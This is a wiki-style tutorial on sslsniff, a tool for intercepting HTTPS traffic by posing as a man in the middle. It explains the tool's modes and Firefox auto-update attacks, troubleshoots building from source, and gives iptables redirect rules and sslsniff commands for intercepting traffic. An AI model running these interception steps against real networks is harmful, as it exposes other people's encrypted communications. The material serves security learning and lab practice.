A tool from Moxie Marlinspike.

Also see SSLStrip.

Github repo: https://github.com/moxie0/sslsniff

Overview

sslsniff is slightly different from sslstrip. The intention of sslstrip is to turn HTTPS requests into HTTP requests, thereby forcing the sheep through an insecure connection. sslsniff is a tool focusing more on certificates.

sslsniff has two modes: authority mode, and targeted mode. In addition, it implements several attacks on Firefox auto-updates.

In authority mode, sslsniff acts as a certificate authority, using a custom certificate (or a self-signed, auto-generated certificate) to sign requests. This won't get you very far, since a self-signed certificate won't be trusted. A forged certificate or a root certificate that you can use to sign other certificates is required to pull off an attack on HTTPS. SSLSniff authority mode is also useful for exploiting improper implementation of BasicConstraints, which allows you to create a leaf node certificate in place of a CA certificate.

In targeted mode, sslsniff uses particular certificates for particular domains or sets of domains. This is intended for use when you have certificates that will only work for certain domains.

By taking over the Firefox auto-update process, you can install arbitrary binary blobs into the browser - keyloggers, certificate bundles, etc etc.

In Plain English

There is not an off-the-shelf attack to just automatically strip out SSL - modern sites and modern browsers are hip to that jive. You'll need to obtain a trusted certificate, or you'll have to make your own and install it in the client's browser's list of trusted certificates. This tool leads to the wonderful and wide world of certificates, certificate authorities, and the many ways of tricking browsers into trusting and accepting your certificates.

Real World Application

As a common example of how this happens (legitimately) in everyday life, hop onto any web browser in a public library, or at your workplace, or at a university. Open the list of trusted certificates in the browser. You are almost guaranteed to find one that is issued and signed by the institution itself, and not by a certificate authority. That allows these institutions to strip out the SSL and decrypt all of your HTTPS traffic, examine it to make sure you aren't looking at naughty things or sending emails with nuclear secrets, and then bundle the traffic back up and ship it on out to the other end.

The fact that the certificate is trusted by your browser means neither end of the "encrypted" conversation will complain when an attacker tampers with the traffic and re-encrypts it, because the institution can use that certificate to masquerade as YOU.

Carrying Out SSL Sniff Attacks in Practice

These two MITM (man in the middle) labs cover how to sniff encrypted traffic and decrypt it offline using Wireshark or SSLSniff by using either the .pem private key file, or the SSL key information dumped to a file:

• MITM Labs/Decrypting HTTPS Traffic with Stolen Private Key
• MITM Labs/Decrypting HTTPS Traffic by Compromising Browser SSL Keys

Building

From Aptitude

On Kali:

apt-get install sslsniff

From Source

TLDR: Use my fork: http://github.com/charlesreid1/sslsniff

ooookay, first you need autotools, and boost, and log4cpp:

apt-get install autotools-dev libboost1.61-dev libboost-filesystem-dev libboost-thread-dev liblog4cpp5-dev

then you need these commands to make a configure file:

aclocal
autoconf
automake --add-missing

then you need to run the usual configure+make:

./configure
make

If you run make install, it will install it over the system sslsniff. For me, that came from the Kali apt repositories, and that program crashed, which is why I had to work out the song and dance to get sslsniff to compile. Additionally, there are some really, really stale (5+ year old) issues on the sslsniff repo on Github, so this tool has been dead for a looooong time.

Errors

libcrypto:

On compile I was seeing some missing symbol errors about openssl stuff:

$ make

g++ -ggdb -g -O2 -o sslsniff -lssl -lboost_filesystem -lpthread -lboost_thread -llog4cpp \
SSLConnectionManager.o Destination.o FirefoxUpdater.o Logger.o SessionCache.o SSLBridge.o HTTPSBridge.o sslsniff.o FingerprintManager.o AuthorityCertificateManager.o \
TargetedCertificateManager.o CertificateManager.o HttpBridge.o HttpConnectionManager.o HttpHeaders.o UpdateManager.o OCSPDenier.o FirefoxAddonUpdater.o
/usr/bin/ld: AuthorityCertificateManager.o: undefined reference to symbol 'X509_gmtime_adj@@OPENSSL_1.0.2d'
//usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.2: error adding symbols: DSO missing from command line
collect2: error: ld returned 1 exit status
Makefile:388: recipe for target 'sslsniff' failed
make: *** [sslsniff] Error 1

I checked this library file (.so) to see if that symbol was, in fact, defined, and it was:

$ readelf -Ws /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.2 | grep gmtime
    31: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND gmtime_r@GLIBC_2.2.5 (5)
    93: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND gmtime@GLIBC_2.2.5 (5)
   179: 000000000016acb0     7 FUNC    GLOBAL DEFAULT   13 X509_gmtime_adj@@OPENSSL_1.0.2d

So what gives?

I tried re-ordering the library flags, and got this:

$ g++ -ggdb -g -O2  -o sslsniff -lboost_filesystem -lpthread -lboost_thread -llog4cpp -lssl  \
SSLConnectionManager.o Destination.o FirefoxUpdater.o Logger.o SessionCache.o SSLBridge.o HTTPSBridge.o sslsniff.o FingerprintManager.o AuthorityCertificateManager.o \
TargetedCertificateManager.o CertificateManager.o HttpBridge.o HttpConnectionManager.o HttpHeaders.o UpdateManager.o OCSPDenier.o FirefoxAddonUpdater.o
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libboost_filesystem.so: undefined reference to symbol '_ZN5boost6system15system_categoryEv'
//usr/lib/x86_64-linux-gnu/libboost_system.so.1.61.0: error adding symbols: DSO missing from command line
collect2: error: ld returned 1 exit status

but again, I checked the library file and saw that that symbol is, in fact, defined:

$ readelf -Ws /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libboost_filesystem.so | grep ZN5boost6system15system
    47: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZN5boost6system15system_categoryEv

Getting Help

Get some help:

sslsniff -h

Important Flags

Important flags:

• -a/-t - authority vs targeted mode

Required options:

• -c - file containing CA certificate or key (authority mode), or a directory with a collection of certificates (targeted mode)
• -s port - port to listen on for ssl interception
• -w file - file to log output to

Running

Prepare Firewall

A note on ports

sslsniff will use a minimum of 1, potentially 2 ports.

1 port will be dedicated to SSL sniffing. This is the port where all HTTPS traffic is redirected. This can be, e.g., port 6666. It is set with the -s flag.

1 port will be dedicated to HTTP sniffing, for OS fingerprinting. This is a different port. This can be, e.g., port 6667. It is set with the -h flag.

Running with MITM

Tell your machine to forward packets:

echo 1 > /proc/sys/net/ipv4/ip_forward

Flush rules from iptables:

$ iptables -F

Add a rule to intercept HTTPS traffic:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>

If you're going to do client fingerprinting, add a rule to intercept HTTP traffic:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports <$httpListenPort>

Running in Authority Mode

To run in authority mode:

sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>

Running In Targeted Mode

To run sslsniff in targeted mode, pass the -t flag and tell it where to find the directory of certificates with -c. The null prefix certificates in the certs directory come with sslsniff, to use those add the flag -m IPSCACLASEA1.crt. There are no targeted certs that come with sslsniff. There is a universal wildcard certificate example.

$ sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt -c <$certDir>

See note on listenport above - I set it to 6666. Also, you can add the -h flag to intercept http traffic for OS fingerprinting:

$ sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt -c <$certDir> -h <$httpListenPort>

Failure

SSLSniff is failing in targeted mode with segmentation faults. Can't deal with certificate files, logging, and listening, all at the same time, apparently. Don't know.

Example Certs

Wildcard cert: https://github.com/moxie0/sslsniff/blob/master/certs/wildcard

Links

http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Understanding-Man-in-the-Middle-Attacks-ARP-Part4.html

http://cyborg.ztrela.com/sslsniff.php/

Flags

monkey in the middle attacks in which an attacker tricks two parties into thinking they're communicating with each other, but both are communicating with the attacker. MITM Wireless Attacks: MITM/Wireless Wired Attacks: MITM/Wired Layer 1 and 2 MITM Attacks: MITM/Layer 1 and 2 Network Tap: MITM/Wired/Network Tap Evil Twin Attack: Evil Twin  · MITM/Evil Twin Layer 3 and 4 MITM Attacks: MITM/Layer 3 and 4 Traffic Sniffing: MITM/Sniffing ARP Poisoning: MITM/ARP Poisoning Traffic Injection/Modification: MITM/Traffic Injection DNS Attacks: MITM/DNS  · Bettercap/Failed DNS Spoofing Attack  · Bettercap/Failed DNS Spoofing Attack 2 DHCP Attacks: MITM/DHCP WPAD MITM Attack: MITM/WPAD Port Stealing: MITM/Port Stealing Rushing Attack: MITM/Rushing Attack Attacking HTTPS: MITM/HTTPS Layer 5 MITM Attacks: Session Hijacking: MITM/Session Hijacking Toolz: Ettercap  · Bettercap  · MITMf  · EvilFOCA Wireshark  · Aircrack Dsniff  · Arpspoof  · Dnsspoof SSLSniff  · SSLStrip  · Frankencert Driftnet  · Karma MITM Labs: {{MITMLabs}} Category:MITM  · Category:Attacks  · Category:Kali Attack Layers Template:MITMLabs  · Template:MITMFlag Flags  · Template:MITMFlag  · e